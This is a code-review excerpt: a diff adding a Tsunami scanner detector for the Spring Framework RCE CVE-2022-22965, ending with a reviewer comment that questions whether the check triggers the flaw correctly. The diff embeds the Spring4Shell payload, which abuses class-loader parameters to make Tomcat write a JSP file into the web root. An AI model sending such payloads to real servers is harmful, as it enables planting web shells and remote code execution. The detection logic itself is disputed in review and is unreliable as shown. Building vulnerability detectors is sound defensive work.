community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring/SpringCve202222965Detector.java

```diff
@@ -0,0 +1,183 @@
+import java.time.Clock;
+import java.time.Instant;
+import java.util.Date;
+import javax.inject.Inject;
+
+/**
+ * A {@link VulnDetector} that detects Spring Framework RCE(CVE-2022-22965)
+ */
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "SpringCve202222965Detector",
+    version = "0.1",
+    description = "This detector checks for Spring Framework RCE(CVE-2022-22965).",
+    author = "C4o (syttcasd@gmail.com)",
+    bootstrapModule = SpringCve202222965DetectorBootstrapModule.class)
+public final class SpringCve202222965Detector implements VulnDetector {
+
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+  private static final String FILENAME = "SpringCoreRCEDetect";
+  private static final String FORMAT = ".yyyy";
+  private static final SimpleDateFormat time_format = new SimpleDateFormat(FORMAT);
+  private static final Date time_now = new Date();
+  private static final String VERIFY_STRING = "TSUNAMI_SpringCoreRCEDetect";
+  private static final String VULNERABILITY_PAYLOAD_STRING = "class.module.classLoader.resources."
+      + "context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(%22j%22))%7B%20out."
+      + "println(new%20String(%22"+VERIFY_STRING+"%22))%3B%20%7D%25%7Bsuffix%7Di&class.module."
+      + "classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader."
+      + "resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader."
+      + "resources.context.parent.pipeline.first.prefix="+FILENAME+"&class.module.classLoader."
+      + "resources.context.parent.pipeline.first.fileDateFormat="+FORMAT;
+  private static final String FIX_PAYLOAD_STRING = "class.module.classLoader.resources.context."
+      + "parent.pipeline.first.pattern=";
+  private static final ByteString VULNERABILITY_PAYLOAD
+      = ByteString.copyFromUtf8(VULNERABILITY_PAYLOAD_STRING);
+  private static final ByteString FIX_PAYLOAD = ByteString.copyFromUtf8(FIX_PAYLOAD_STRING);
+
+  private final Clock utcClock;
+  private final HttpClient httpClient;
+
+  @Inject
+  SpringCve202222965Detector(@UtcClock Clock utcClock, HttpClient httpClient) {
+    this.utcClock = checkNotNull(utcClock);
+    this.httpClient = checkNotNull(httpClient);
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(NetworkServiceUtils::isWebService)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService);
```

Comment:
This way of checking will miss the point of vulnerability, are you sure you really understand how the vulnerability is triggered? And the conditions under which the vulnerability is triggered?